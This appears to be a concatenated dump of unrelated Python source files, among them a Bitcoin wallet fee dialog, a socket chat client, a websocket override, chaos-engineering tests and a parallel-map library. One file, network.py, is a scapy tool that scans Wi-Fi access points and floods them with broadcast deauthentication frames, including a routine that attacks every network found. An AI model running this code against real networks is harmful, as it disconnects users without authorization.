grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
network.py | from operator import ne
import sys, os, signal,json
from multiprocessing import Process
from itsdangerous import exc
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11ProbeResp,Dot11Elt, RadioTap, sendp, Dot11Deauth
from scapy.all import *
def channel_hopper():
while True:
try:
channel = random.randrange(1,14)
exe = "iw dev %s set channel %d" % ("wlan0mon", channel)
os.system(exe)
print(exe)
time.sleep(1)
except KeyboardInterrupt:
break
class Ap:
def __init__ (self, ssid, bssid, channel, enc):
self.ssid = ssid
self.bssid = bssid
self.channel = channel
self.enc = enc
def getApInfo(self):
return {"ssid":self.ssid,"bssid":self.bssid,"channel":self.channel}
class Network:
def __init__(self, interface):
self.interface = interface
self.aps = {}
self.target = ""
self.rssList = []
self.attackAP = []
self.processList = []
def updateApList(self):
self.hopStart()
sniff(iface=self.interface, prn=self.sniffAP, timeout=10)
self.hopStop()
def getApList(self):
ls = []
for data in self.aps.keys():
ls.append(self.aps[data].getApInfo())
return ls
def getPowerData(self, adr, channel):
print(adr, channel)
self.target = adr
self.rssList = []
self.setChannel(channel)
sniff(iface=self.interface, prn=self.getRssi, count=50)
res = -100
try:
res = sum(self.rssList) / len(self.rssList)
except:
res = -100
return res
def getRssi(self, pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8 :
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
if pkt.addr3 == self.target:
try:
extra = pkt.notdecoded
rssi = -(256-ord(extra[-4:-3]))
except:
rssi = -100
print(rssi)
self.rssList.append(rssi)
def setChannel(self, channel):
exe = "iw dev %s set channel %d" % (self.interface, channel)
os.system(exe)
def hopStop(self):
for pro in self.processList:
pro.terminate()
pro.join()
self.processList.clear()
def hopStart(self):
tmpProcess = Process(target = channel_hopper)
tmpProcess.start()
self.processList.append(tmpProcess)
def sniffAP(self, pkt):
if( (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and not pkt[Dot11].addr3 in self.aps.keys()):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
channel = int( ord(pkt[Dot11Elt:3].info))
capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}\
{Dot11ProbeResp:%Dot11ProbeResp.cap%}")
# Check for encrypted networks
if re.search("privacy", capability): enc = 'Y'
else: enc = 'N'
# Save discovered AP
self.aps[pkt[Dot11].addr3] = Ap(str(ssid), str(bssid), str(channel), enc)
# Display discovered AP
print ("%02d %s %s %s" % (int(channel), enc, bssid, ssid))
def deAuth(self, apAdr, channel):
self.setChannel(channel)
ap = apAdr
client = "FF:FF:FF:FF:FF:FF"
pkt = RadioTap() / Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
sendp(pkt, iface=self.interface, inter=0.100, loop=1, count=50)
def autoDeAuth(self):
time.sleep(1)
print(self.attackAP)
print("thread:",id(self.attackAP))
for i in self.aps:
try:
pkt = RadioTap() / Dot11(addr1="FF:FF:FF:FF:FF:FF", addr2=i.bssid, addr3=i.bssid) / Dot11Deauth()
print(i, "Send Deauth Packet")
sendp(pkt, iface=self.interface, inter=0.1, loop=1, count=30)
except:
continue
def deauthAll(self):
aplist = self.getApList()
for ap in aplist:
print("Now Attack:", ap['ssid'], ap['bssid'])
self.setChannel(int(ap['channel']))
pkt = RadioTap() / Dot11(addr1="FF:FF:FF:FF:FF:FF", addr2=ap['bssid'], addr3=ap['bssid']) / Dot11Deauth()
sendp(pkt, iface=self.interface, inter=0.1, loop=1, count=30)
if __name__ == "__main__":
# Start the channel hopper
network = Network("wlan0mon")
#print("set channel")
network.hopStart()
time.sleep(4)
network.hopStop()
network.hopStart()
#print("dar", network.getPowerData("fc:7f:f1:b0:55:80", 6))
# network.getPowerData("fc:7f:f1:ae:80:e0", 11)
#network.deAuth("FF:FF:FF:FF:FF:FF", "90:9f:33:1b:13:aa", 1)
#network.deAuth("FF:FF:FF:FF:FF:FF", "FF:FF:FF:FF:FF:FF", 1)
#network.deAuth("08:AE:D6:01:98:5F", "90:9f:33:1b:13:aa", 1)
#network.updateApList(p)
#print(network.getApList())
#p2 = Process(target=network.getPowerData)
#p2.start()
# Start the sniffer
#sniff(iface=network.interface, prn=network.sniffAP) |
client.py | import socket
import argparse
import threading
#접속하고 싶은 ip와 port를 입력받는 클라이언트 코드를 작성해보자.
# 접속하고 싶은 포트를 입력한다.
port = 4000
def handle_receive(lient_socket, user):
while 1:
try:
data = client_socket.recv(1024)
except:
print("연결 끊김")
break
data = data.decode('utf-8')
if not user in data:
print(data)
def handle_send(client_socket):
while 1:
data = input()
client_socket.send(data.encode('utf-8'))
if data == "/종료":
break
client_socket.close()
if __name__ == '__main__':
#parser와 관련된 메서드 정리된 블로그 : https://docs.python.org/ko/3/library/argparse.html
#description - 인자 도움말 전에 표시할 텍스트 (기본값: none)
#help - 인자가 하는 일에 대한 간단한 설명.
#nargs - 소비되어야 하는 명령행 인자의 수. -> '+'로 설정 시 모든 명령행 인자를 리스트로 모음 + 없으면 경고
#required - 명령행 옵션을 생략 할 수 있는지 아닌지 (선택적일 때만).
parser = argparse.ArgumentParser(description="\nJoo's client\n-p port\n-i host\n-s string")
parser.add_argument('-p', help="port")
parser.add_argument('-i', help="host", required=True)
parser.add_argument('-u', help="user", required=True)
args = parser.parse_args()
host = args.i
user = str(args.u)
try:
port = int(args.p)
except:
pass
#IPv4 체계, TCP 타입 소켓 객체를 생성
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 지정한 host와 prot를 통해 서버에 접속합니다.
client_socket.connect((host, port))
client_socket.send(user.encode('utf-8'))
receive_thread = threading.Thread(target=handle_receive, args=(client_socket, user))
receive_thread.daemon = True
receive_thread.start()
send_thread = threading.Thread(target=handle_send, args=(client_socket,))
send_thread.daemon = True
send_thread.start()
send_thread.join()
receive_thread.join()
|
websocket_override.py |
import time
import six
import json
import threading
from websocket._abnf import ABNF
from websocket._core import WebSocket, getdefaulttimeout
from websocket._exceptions import *
import websocket._logging
class PusherWebsocket(websocket.WebSocket):
def ping(self, payload=""):
subscriber_message = {'event': "pusher:ping", 'data': '{}'}
payload = json.dumps(subscriber_message)
self.send(payload)
class PusherWebsocketApp(websocket.WebSocketApp):
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None):
if not ping_timeout or ping_timeout <= 0:
ping_timeout = None
if ping_timeout and ping_interval and ping_interval <= ping_timeout:
raise WebSocketException("Ensure ping_interval > ping_timeout")
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
close_frame = None
self.keep_running = True
self.last_ping_tm = 0
self.last_pong_tm = 0
def teardown():
if thread and thread.isAlive():
event.set()
thread.join()
self.keep_running = False
self.sock.close()
close_args = self._get_close_args(
close_frame.data if close_frame else None)
self._callback(self.on_close, *close_args)
self.sock = None
try:
self.sock = PusherWebsocket(
self.get_mask_key, sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message and True or False,
skip_utf8_validation=skip_utf8_validation)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(
self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port, http_no_proxy=http_no_proxy,
http_proxy_auth=http_proxy_auth, subprotocols=self.subprotocols,
host=host, origin=origin)
if not dispatcher:
dispatcher = self.create_dispatcher(ping_timeout)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(
target=self._send_ping, args=(ping_interval, event))
thread.setDaemon(True)
thread.start()
def read():
if not self.keep_running:
return teardown()
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
close_frame = frame
return teardown()
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG or frame.data.decode("utf-8") == '{"event":"pusher:pong","data":"{}"}':
self.last_pong_tm = time.time()
self._callback(self.on_pong, frame.data)
pong_event = frame.data.decode("utf-8")
#print(f"Recieved Pong Event: {pong_event}")
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, frame.data,
frame.opcode, frame.fin)
self._callback(self.on_cont_message,
frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and op_code == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
return True
def check():
if ping_timeout and self.last_ping_tm \
and time.time() - self.last_ping_tm > ping_timeout \
and self.last_ping_tm - self.last_pong_tm > ping_timeout:
raise WebSocketTimeoutException("ping/pong timed out")
return True
dispatcher.read(self.sock.sock, read, check)
except (Exception, KeyboardInterrupt, SystemExit) as e:
self._callback(self.on_error, e)
if isinstance(e, SystemExit):
# propagate SystemExit further
raise
teardown()
|
test_exit.py | import os
import threading
import time
from copy import deepcopy
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
import pytest
from fixtures import experiments
from chaoslib.exit import exit_gracefully, exit_ungracefully
from chaoslib.run import Runner
from chaoslib.types import Strategy
pytestmark = pytest.mark.skipif(os.getenv("CI") is not None, reason="Skip CI")
def run_http_server_in_background():
def slow_app(environ, start_response):
time.sleep(5)
status = "200 OK"
headers = [("Content-type", "text/plain; charset=utf-8")]
start_response(status, headers)
return [b"Hello World"]
def make_server(host, port, app):
server = WSGIServer((host, port), WSGIRequestHandler)
server.set_app(app)
return server
httpd = make_server("", 8700, slow_app)
httpd.handle_request()
def test_play_rollbacks_on_graceful_exit_with_http_action():
server = threading.Thread(target=run_http_server_in_background)
server.start()
x = deepcopy(experiments.ExperimentGracefulExitLongHTTPCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(
x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
)
assert journal["status"] == "interrupted"
assert len(journal["rollbacks"]) == 1
server.join()
def test_do_not_play_rollbacks_on_graceful_exit_with_http_action():
server = threading.Thread(target=run_http_server_in_background)
server.start()
x = deepcopy(experiments.ExperimentUngracefulExitLongHTTPCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(
x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
)
assert journal["status"] == "interrupted"
assert len(journal["rollbacks"]) == 0
server.join()
def test_play_rollbacks_on_graceful_exit_with_process_action():
x = deepcopy(experiments.ExperimentGracefulExitLongProcessCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(
x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
)
assert journal["status"] == "interrupted"
assert len(journal["rollbacks"]) == 1
def test_do_not_play_rollbacks_on_graceful_exit_with_process_action():
x = deepcopy(experiments.ExperimentUngracefulExitLongProcessCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(
x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
)
assert journal["status"] == "interrupted"
assert len(journal["rollbacks"]) == 0
def test_play_rollbacks_on_graceful_exit_with_python_action():
x = deepcopy(experiments.ExperimentGracefulExitLongPythonCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(
x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
)
assert journal["status"] == "interrupted"
assert len(journal["rollbacks"]) == 1
def test_do_not_play_rollbacks_on_graceful_exit_with_python_action():
server = threading.Thread(target=run_http_server_in_background)
server.start()
x = deepcopy(experiments.ExperimentUngracefulExitLongHTTPCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(
x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
)
assert journal["status"] == "interrupted"
assert len(journal["rollbacks"]) == 0
server.join()
def test_wait_for_background_activity_on_graceful_exit():
server = threading.Thread(target=run_http_server_in_background)
server.start()
x = deepcopy(experiments.ExperimentGracefulExitLongHTTPCall)
with Runner(Strategy.DEFAULT) as runner:
journal = runner.run(x)
assert journal["status"] == "interrupted"
assert 3.0 < journal["run"][0]["duration"] < 3.2
server.join()
def test_do_not_wait_for_background_activity_on_ungraceful_exit():
def _exit_soon():
time.sleep(1.5)
exit_ungracefully()
t = threading.Thread(target=_exit_soon)
x = deepcopy(experiments.SimpleExperimentWithBackgroundActivity)
with Runner(Strategy.DEFAULT) as runner:
t.start()
journal = runner.run(x)
assert journal["status"] == "interrupted"
assert journal["run"][0]["status"] == "failed"
assert "ExperimentExitedException" in journal["run"][0]["exception"][-1]
def test_wait_for_background_activity_to_finish_on_graceful_exit():
def _exit_soon():
time.sleep(1.5)
exit_gracefully()
t = threading.Thread(target=_exit_soon)
x = deepcopy(experiments.SimpleExperimentWithBackgroundActivity)
with Runner(Strategy.DEFAULT) as runner:
t.start()
journal = runner.run(x)
assert journal["status"] == "interrupted"
assert journal["run"][0]["status"] == "succeeded"
|
parmapper.py | # -*- coding: utf-8 -*-
"""
parmap (or parmapper): Tool for easy parallel function mapping
without requiring a pickleable function (e.g. lambdas).
This script is from Jwink3101, https://github.com/Jwink3101/parmapper
"""
from __future__ import print_function, unicode_literals, division
__version__ = '20210422.0'
import multiprocessing as mp
import multiprocessing.dummy as mpd
from threading import Thread
import threading
import sys,os
from collections import defaultdict
import warnings
import math
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
import tqdm
except ImportError:
tqdm = None
from functools import partial
if sys.version_info[0] > 2:
unicode = str
xrange = range
imap = map
else:
from itertools import imap
CPU_COUNT = mp.cpu_count()
class _Exception(object):
"""Storage of an exception (and easy detection)"""
def __init__(self,E,infun=True):
self.E = E
self.infun = infun
def parmap(fun,seq,
N=None,Nt=1,
chunksize=1,
ordered=True,
daemon=True,
progress=False,
args=(),kwargs=None,
star=False,kwstar=False,
exception=None):
"""
parmap -- Simple parallel mapper that can split amongst processes (N)
and threads (Nt) (within the processes).
Does *NOT* require functions to be pickleable (unlike
vanilla multiprocess.Pool.map)
Inputs:
-------
fun
Single input function. Use lambdas or functools.partial
to enable/exapnd multi-input. See example
seq
Sequence of inputs to map in parallel
Options:
--------
N [None] (integer or None)
Number of processes to use. If `None`, will use the CPU_COUNT
Nt [1] (integer)
Number of threads to use. See notes below on multi-threaded vs
multi-processes.
chunksize [1] (int)
How to be break up the incoming sequence. Useful if also using threads.
Will be (re)set to max(chunksize,Nt).
Alternativly, if len(seq) exists and chunksize=-1 it will be reset
to ceil(len(seq)/(N*Nt)). If chunksize=-1 and len(sequence) is not
known, a warning will be emitted and chucksize will be reset to
max(chunksize,Nt)
ordered [True] (bool)
Whether or not to order the results. If False, will return in whatever
order they finished.
daemon [True] (bool)
Sets the multiprocessing `daemon` flag. If True, can not spawn child
processes (i.e. cannot nest parmap) but should allow for CTRL+C type
stopping. Supposedly, there may be issues with CTRL+C with it set to
False. Use at your own risk
progress [False] (bool)
Display a progress bar or counter.
Warning: Inconsistant in iPython/Jupyter notebooks and may clear
other printed content. Instead, specify as 'nb' to use a Jupyter
Widget progress bar.
args [tuple()]
Specify additional arguments for the function. They are added *after*
the input argument
kwargs [dict()]
Specify additional keyword arguments
star [False]
If True, the arguments to the function will be "starred" so, for example
if `seq = [ (1,2), (3,4) ]`, the function will be called as
star is False: fun((1,2))
star is True: fun(1,2) <==> fun(*(1,2))
Can also set to None to not send anything
kwstar [False]
Assumes all items are (vals,kwvals) where `vals` RESPECTS `star`
setting and still includes `args` and `kwvals`. See "Additional
Arguments" section below.
exception ['raise' if N>1 else 'proc']
Choose how to handle an exception in a child process
'raise' : [Default] raise the exception (outside of the Process).
Also terminates all existing processes.
'return' : Return the Exception instead of raising it.
'proc' : Raise the exception inside the process. NOT RECOMMENDED
unless used in debugging (and with N=1)
Note: An additional attribute called `seq_index` will also be set
in the exception (whether raised or returned) to aid in debugging.
Additional Arguments
--------------------
As noted above, there are many ways to pass additional arguments to
your function. All of these are not completely needed since parmap
makes using lambdas so easy, but they are there if preffered.
Assume the following function:
def dj(dictA,dictB):
'''Join dictA and dictB where dictB takes precedence'''
dictA = dictA.copy()
dictA.update(dictB) # NOTE: dictB takes precedence
return dictA
Then the behavior is as follows where `args` and `kwargs` come from
they main function call. The `val` (singular), `vals` (sequence/tuple of
values), and `kwvals` are set via the sequence.
| star | kwstar | expected | args | kw args | |
|-------|--------|------------|----------------|---------------------|---|
| False | False | val | *((val,)+args) | **kwargs | A |
| True | False | vals | *(vals+args) | **kwargs | |
| None | False | --- | *args | **kwargs | B |
| None | True | --- | *args | **dj(kwargs,kwvals) | C |
| False | True | val,kwval | *((val,)+args) | **dj(kwargs,kwvals) | C |
| True | True | vals,kwval | *(vals+args) | **dj(kwargs,kwvals) | C |
A: Default
B: If kwargs and args are empty, basically calls with nothing
C: Note the ordering so kwvals takes precedance
Note:
-----
Performs SEMI-lazy iteration based on chunksize. It will exhaust the input
iterator but will yield as results are computed (This is similar to the
`multiprocessing.Pool().imap` behavior)
Explicitly wrap the parmap call in a list(...) to force immediate
evaluation
Threads and/or Processes:
-------------------------
This tool has the ability to split work amongst python processes
(via multiprocessing) and python threads (via the multiprocessing.dummy
module). Python is not very performant in multi-threaded situations
(due to the GIL) therefore, processes are the usually the best for CPU
bound tasks and threading is good for those that release the GIL (such
as IO-bound tasks).
WARNING: Many NumPy functions *do* release the GIL and can be threaded,
but many NumPy functions are, themselves, multi-threaded.
Alternatives:
-------------
This tool allows more data types, can split with threads, has an optional
progress bar, and has fewer pickling issues, but these come at a small cost.
For simple needs, the following may be better:
>>> import multiprocessing as mp
>>> with mp.Pool(N) as pool:
>>> results = list( pool.imap(fun,seq) ) # or just pool.map
Start Methods:
--------------
* This tool is NOT compatible with Windows, just macOS (see below)
and Linux
* on macOS, starting with python3.8, the start method must be explicity set
when python starts up. See the [1] for details.
>>> import multiprocessing as mp
>>> mp.set_start_method('fork')
If this has already been set, it will throw a RuntimeError.
Alternativly, call the parmap(per).set_start_method()
Or, set the PYTOOLBOX_SET_START=true as an enviorment variable and this
will be set on module load. For example,
export PYTOOLBOX_SET_START=true
Also, set the following to prevent issues [2][3]
export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
to your .bashrc
[1]: https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods
[2]: https://www.wefearchange.org/2018/11/forkmacos.rst.html
[3]: https://stackoverflow.com/q/50168647/3633154
Additional Note
---------------
For the sake of convienance, a `map = imap = __call__` and
`close = lamba *a,**k:None` are also added so a parmap function can mimic
a multiprocessing pool object with duck typing
Version:
-------
__version__
"""
# Additional Notes:
# This currently assumes the starting behavior of multiprocessing for
# python 3.8. When 3.9 is released, it may have to be updated again.
if sys.platform.lower().startswith('win'):
raise RuntimeError('Not compatible with Windows')
if sys.platform.startswith('darwin') and \
sys.version_info >= (3,8) and \
mp.get_start_method(allow_none=True) != 'fork':
raise RuntimeError("Must set multiprocessing start_method to 'fork'. "
"Use `set_start_method` or see documentation")
# Build up a dummy function with args,vals,kwargs, and kwvals
if kwargs is None:
kwargs = {}
def _fun(ss):
_args = list(args)
_kw = kwargs.copy()
try:
# Check for None before boolean
if star is None and kwstar: # 4
_kw.update(ss)
elif star is None and not kwstar: # 3
pass
elif not star and not kwstar: # 1
_args = [ss] + _args
elif star and not kwstar: # 2
_args = list(ss) + _args
elif not star and kwstar: # 5
_args = [ss[0]] + _args
_kw.update(ss[1])
elif star and kwstar: # 6
_args = list(ss[0]) + _args
_kw.update(ss[1])
else:
raise TypeError()
except TypeError: # Mostly because bad input types
return _Exception(TypeError('Ensure `args` are tuples and `kwargs` are dicts'),infun=False)
except Exception as E:
return _Exception(E,infun=False)
if exception == 'proc':
return fun(*_args,**_kw) # Outside of a try
try:
return fun(*_args,**_kw)
except Exception as E:
return _Exception(E)
# It would be great to include all of sys.exc_info() but tracebacks
# cannot be pickled.
try:
tot = len(seq)
except TypeError:
tot = None
N = CPU_COUNT if N is None else N
if exception is None:
exception = 'raise' if N>1 else 'proc'
if chunksize == -1:
if tot is None:
warnings.warn('chunksize=-1 does not work when len(seq) is not known')
else:
chunksize = math.ceil(tot/(N*Nt))
chunksize = max(chunksize,Nt) # Reset
# Consider resetting N
if tot is not None:
N = min(N,tot//chunksize)
# Build a counter iterator based on settings and tqdm
if tqdm is None:
if isinstance(progress,(str,unicode))\
and progress.lower() in ['jupyter','notebook','nb']:
counter = partial(_counter_nb,tot=tot)
else:
counter = partial(_counter,tot=tot)
else:
if isinstance(progress,(str,unicode))\
and progress.lower() in ['jupyter','notebook','nb']\
and hasattr(tqdm,'tqdm_notebook'):
counter = partial(tqdm.tqdm_notebook,total=tot)
else:
counter = partial(tqdm.tqdm,total=tot) # Set the total since tqdm won't be able to get it.
# Handle N=1 without any multiprocessing
if N == 1:
try:
if Nt == 1:
out = imap(_fun,seq)
else:
pool = mpd.Pool(Nt) # thread pools don't have the pickle issues
out = pool.imap(_fun,seq)
if progress:
out = counter(out)
for count,item in enumerate(out):
if isinstance(item,_Exception):
item.E.seq_index = count # Store the index where this happened
if not item.infun:
exception = 'raise' # reset
if exception == 'raise':
raise item.E
elif exception == 'return':
item = item.E
elif exception == 'proc':
pass
else:
raise ValueError("Unrecognized `exception` setting '{}'".format(exception))
yield item
finally:
if Nt > 1:
pool.close()
return
q_in = mp.JoinableQueue() # Will need to `join` later to make sure is empty
q_out = mp.Queue()
workers = [mp.Process(target=_worker, args=(_fun, q_in, q_out,Nt)) for _ in range(N)]
# Create a separate thread to add to the queue in the background
def add_to_queue():
for iixs in _iter_chunks(enumerate(seq),chunksize):
q_in.put(iixs)
# Once (if ever) it is exhausted, send None to close workers
for _ in xrange(N):
q_in.put(None)
# Define a generator that will pull from the q_out and then run through
# the rest of our generator/iterator chain for progress and ordering
def queue_getter():
finished = 0
count = 0
while finished < N:
out = q_out.get()
if out is None:
finished += 1
continue
for o in out: # yield from out
yield o
try:
# Start the workers
for worker in workers:
worker.daemon = daemon
worker.start()
add_to_queue_thread = Thread(target=add_to_queue)
add_to_queue_thread.start()
# Chain generators on output
out = queue_getter()
if progress:
out = counter(out)
if ordered:
out = _sort_generator_unique_integers(out,key=lambda a:a[0])
# Return items
for item in out:
count = item[0]
item = item[1]
if isinstance(item,_Exception):
item.E.seq_index = count
if not item.infun:
exception = 'raise' # reset
if exception == 'raise':
for worker in workers:
worker.terminate()
raise item.E
elif exception == 'return':
item = item.E
elif exception == 'proc':
pass
else:
for worker in workers:
worker.terminate()
raise ValueError("Unrecognized `exception` setting '{}'".format(exception))
yield item
finally:
# Clean up threads and processes. Make sure the queue is exhausted
add_to_queue_thread.join() # Make sure we've exhausted the input
q_in.join() # Make sure there is nothing left in the queue
for worker in workers:
worker.join() # shut it down
# Add dummy methods
parmap.map = parmap.imap = parmap.__call__
parmap.close = lambda *a,**k: None
parmap.__doc__ = parmap.__doc__.replace('__version__',__version__)
parmapper = parmap # Rename
Xmap = parmap
def _counter(items,tot=None):
for ii,item in enumerate(items):
if tot is not None:
_txtbar(ii,tot,ticks=50,text='')
else:
txt = '{}'.format(ii+1)
print('\r%s' % txt,end='')
sys.stdout.flush()
yield item
def _counter_nb(items,tot=None):
from ipywidgets import IntProgress,IntText
from IPython.display import display
if tot is not None:
g = IntText(value=0,description='total = %d' % tot)
f = IntProgress(min=0,max=tot)
display(f)
g.desription='hi'
else:
g = IntText(value=0)
f = None
display(g)
for ii,item in enumerate(items):
if f:
f.value += 1
g.value+=1
yield item
def _worker(fun,q_in,q_out,Nt):
""" This actually runs everything including threadpools"""
if Nt > 1:
pool = mpd.Pool(Nt)
_map = pool.map # thread pools don't have the pickle issues
else:
_map = map
while True:
iixs = q_in.get()
if iixs is None:
q_out.put(None)
q_in.task_done()
break
def _ap(ix):
i,x = ix
return i, fun(x)
res = tuple(_map(_ap,iixs)) # list forces the iteration
q_out.put(res)
q_in.task_done()
if Nt >1:
pool.close()
def _iter_chunks(seq,n):
"""
yield a len(n) tuple from seq. If not divisible, the last one would be less
than n
"""
_n = 0;
for item in seq:
if _n == 0:
group = [item]
else:
group.append(item)
_n += 1
if _n == n:
yield tuple(group)
_n = 0
if _n > 0:
yield tuple(group)
def _sort_generator_unique_integers(items,start=0,key=None):
"""
Yield from `items` in order assuming UNIQUE keys w/o any missing!
